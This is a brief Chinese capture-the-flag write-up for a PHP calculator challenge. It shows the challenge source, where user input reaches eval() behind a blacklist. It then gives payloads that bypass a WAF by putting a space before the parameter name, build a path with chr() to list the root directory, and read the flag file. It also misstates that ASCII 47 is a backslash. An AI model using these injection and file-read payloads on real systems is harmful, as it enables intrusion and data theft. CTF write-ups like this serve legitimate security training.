审题发现calc.php
访问calc.php发现源码
<?php
error_reporting(0);
if(!isset($_GET['num'])){
show_source(__FILE__);
}else{
$str = $_GET['num'];
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $str)) {
die("what are you want to do?");
}
}
eval('echo '.$str.';');
}
?>
payload1:
?num=1;var_dump(scandir("/"))
被waf拦截
payload2:
? num=1;var_dump(scandir("/"))
这里已经过了waf,为什么?
php的解析规则,当php进行解析的时候,如果变量前面有空格,会去掉前面的空格再解析
waf拦截的是变量num,而我们传进去的是’ 'num
’ 'num在php解析时把前面的空格去掉又变成了num
因为$blacklist = [’ ‘, ‘\t’, ‘\r’, ‘\n’,’’’, ‘"’, ‘`’, ‘[’, ‘]’,’$’,’\’,’^’];
所以scandir("/")也需要绕过一下
payload3:
? num=1;var_dump(scandir(chr(47)))
47的ASCII对应的就是’\’
发现flagg
payload4:
? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
读取flagg
PHP知识点:
PHP解析方式
scandir()
var_dump()
file_get_contents()